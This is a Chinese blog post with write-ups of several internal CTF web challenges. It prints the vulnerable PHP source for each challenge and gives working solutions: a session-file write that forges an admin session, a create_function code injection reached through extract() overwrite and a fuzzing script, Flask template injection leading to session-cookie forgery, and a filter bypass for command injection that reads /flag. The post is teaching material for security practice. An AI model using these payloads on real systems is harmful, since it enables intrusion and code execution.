XMCTF内部赛 part1

最新推荐文章于 2021-06-25 12:15:51 发布
最新推荐文章于 2021-06-25 12:15:51 发布
阅读量2.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/106919813
版权

web3-考核

<?php
highlight_file(__FILE__);
$content = @$_GET['content'] ? "---mylocalnote---\n" . $_GET['content'] : "";
$name = @$_GET['name'] ? $_GET['name'] : '';
str_replace('/', '', $name);
str_replace('\\', '', $name);
file_put_contents("/tmp/" . $name, $content);
session_start();
if (isset($_SESSION['username'])) {
    echo "Thank u,{$_SESSION['username']}";
}

知识点:
php session的存储
php储存session的三种方式

php_serialize经过serialize()函数序列化数组
php键名+竖线+经过serialize()函数处理的值
php_binary键名的长度对应的ascii字符+键名+serialize()函数序列化的值

session的存储位置:
一般是存储在/tmp下
自己的位置可在的phpinfo中看到
session.save_path
默认的文件名
sess_PHPSESSID

题目中需要满足 $_SESSION['username']='admin',并且我们可以向/tmp中写入文件,
所以只需要写入 username|s:6:'admin';
因为写入的内容包括题中给的"—mylocalnote—\n" 会被当做键名,所以我们需要闭合,
最终的payload content=|N;username|s:5:"admin";&name=sess_PHPSESSID
其中PHPSESSID换成自己的
接着访问flag.php得到flag

easy-web-考核

<?php
show_source(__FILE__);
$key = "bad";
extract($_POST);
if($key === 'bad'){
    die('badbad!!!');
}
$act = @$_GET['act'];
$arg = @$_GET['arg'];
if(preg_match('/^[a-z0-9_]*$/isD',$act)) {
    echo 'check';
} else {
    $act($arg,'');
}

echo '666';

绕过 die可以利用extract变量覆盖绕过
post:key=1
对于^开头,$结尾的正则,如果用.进行任意字符匹配可以用%0a换行符绕过
这个题我们用fuzz

import requests
data={'key':1}
for i in range(1,256):
        tmp= hex(i)[2:]
        if len(tmp)<2:
                tmp= '0'+hex(i)[2:]
        tmp= '%'+tmp
        url= 'http://xmctf.top:8940/?act='+tmp+'var_dump&arg=23333'
        r =requests.post(url=url,data=data)
        if'23333' in r.text:
                print(r.content)
                print(url)

得到%5c可以绕过正则表达式
对于$act($arg,'');我们很容易想到create_function函数
语法

create_function(string $args,string $code)

string $args 声明的函数变量部分

string $code 执行的方法代码部分

相当于
func($args){$code;}
因为我们可以操作第一个参数所以只需要闭合函数后就可以输入而已代码了
payload:act=%5ccreate_function&arg=){}要执行的代码;//

web8-考核

根据提示说我们的name为None,那么我们尝试输入name=123
发现有回显,猜测可能为模板注入
尝试输入name={{config}}得到信息 'SECRET_KEY': 'woshicaiji'
因为提示说只有admin可以得到flag,猜测考察的flask session伪造,根据SECRET_KEY解密得到{'username': 'guest'},所以我们修改如下{‘username’: ‘admin’}然后加密
得到eyJ1c2VybmFtZSI6ImFkbWluIn0.X6TebA.TDN1tkKIPQU-sJTdDcExZbDERiE修改session的值然后访问/flag即可得到flag

RCE训练

<?php
error_reporting(0);
highlight_file(__file__);
$ip = $_GET['ip'];
if (isset($ip)) {
  if(preg_match("/(;|`| |&|cp|mv|cat|tail|more|rev|tac|\*|\{)/i", $ip)){
      die("hack");
  }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
      die("no!>");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  var_dump($a);
}
?>

过滤了;和|可以用%0a绕过,过滤了空格可以用%09绕过,过滤了flag可以用?绕过
过滤了tail、more、cat、可以用sort绕过
最终payload ip=%0asort%09/fla?

yu22x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
一道有意思的代码审计(create_function)
Panacea
04-27 630
<?php show_source(__FILE__); $key = "bad"; extract($_POST); if($key === 'bad'){ die('badbad!!!'); } $act = @$_GET['act']; $arg = @$_GET['arg']; if(preg_match('/^[a-z0-9_]*$/isD',$act)) { ec...
buuoj、xmctf、攻防世界刷题(web)write up
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
xmctf-web-web3-wp
居上
06-25 110
web3 源代码 <?php highlight_file(__FILE__); $content = @$_GET['content'] ? "---mylocalnote---\n" . $_GET['content'] : ""; $name = @$_GET['name'] ? $_GET['name'] : ''; str_replace('/', '', $name); str_replace('\\', '', $name); file_put_contents("/tmp/" . $n
xmctf web12-考核(无参数RCE)
羽的博客
07-07 1360
web12-考核 无参数RCE <?php header("Content-Type: text/html;charset=utf-8"); include "flag.php"; echo "flag在哪里呢?<br>"; highlight_file(__FILE__); error_reporting(0); if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//
ctf php弱类型、松散比较、哈希缺陷、MD5绕过、变量覆盖
Love&Share
04-27 9916
松散比较 松散比较:==比较时先转数据类型再进行比较 严格比较:=== 比较时先判断两种字符串类型是否相等,再进行比较 例: "admin"==0 #ture "1admin"==1 #ture "admin1"==1 #false 如果该字符串没有包含’.’ ‘e’ 'E’并且数值在整形范围值内,该字符串被当作int来取值,其他所有情况下被当作float来取值,该字符串的开始部分的值决定...
无参数 rce.md
04-01
记录一下,关于这次比的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
CTF 中的 PHP 漏洞利用总结
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
简单记录一下MOCTF的三道web题
0verWatch的博客
03-06 3682
本人渣渣,于是记录一下 死亡退出 一道代码审计题目 &lt;?php show_source(__FILE__); $c="&lt;?php exit;?&gt;"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
xmctf web4-考核
羽的博客
07-07 1369
web4-考核 根据提示key:e086aa137fa19f67d27b39d0eca18610猜测为md5值,解密得到1.1.1.1 在请求头中添加 X-Forwarded-For:1.1.1.1得到一个地址dhudndrgrhs.php内容如下 <?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir",
ctf-web3
gofreshman的博客
12-01 265
sql注入型题目
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1731
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
CTF PHP文件包含--session
weixin_30613727的博客
12-21 1497
PHP文件包含 Session 首先了解一下PHP文件包含漏洞----包含session 利用条件:session文件路径已知,且其中内容部分可控。 姿势: php的session文件的保存路径可以在phpinfo的session.save_path看到。 常见的php-session存放位置: /var/lib/php/sess_PHPSESSID /var/lib/php/s...
xmctf-web-RCE-wp
居上
06-25 94
RCE 源代码 <?php error_reporting(0); highlight_file(__file__); $ip = $_GET['ip']; if (isset($ip)) { if(preg_match("/(;|`| |&|cp|mv|cat|tail|more|rev|tac|\*|\{)/i", $ip)){ die("hack"); }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ die("
[CTFSHOW]SSRF
Y4tacker的博客
01-12 1805
web351 首先代码审计,简简单单的使用php的curl,发现没有过滤,尝试读取本地文件 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_clo
ByteCTF_2019&XNUCA_2019部分web题复现
Lethe's Blog
09-11 4752
EzCMS 1、扫描目录有www.zip,下载得到源码。 整个题目的功能如下: index.php页面验证登陆,可以任意账号登陆到upload.php上传页面,但是只有admin账号才能进行文件上传。 访问了upload.php·,就会在沙盒下生成一个.htaccess文件,内容为:lolololol, i control all。 上传文件后,会返回文件的存储路径,view details可以...
CTF-PHP代码审计,正则表达式记录
江湖
06-08 5911
1.flag In the variable ! &lt;?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ ...
【CTF WEB】函数绕过
weixin_30685047的博客
09-29 244
函数绕过 <?php show_source(__FILE__); $c = "<?php exit;?>"; @$c.=$_GET['c']; @$filename = $_GET['file']; @file_put_contents($filename, $c); highlight_file('tmp.php'); ?> <?php ...
ctf web方向与php学习记录29
这周末在做梦的博客
11-27 791
这里分享一道HECTF的题目 【BOOM】ezphp 一,源码 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET['str1']; $string_2 = $_GET['str2']; if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2']
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值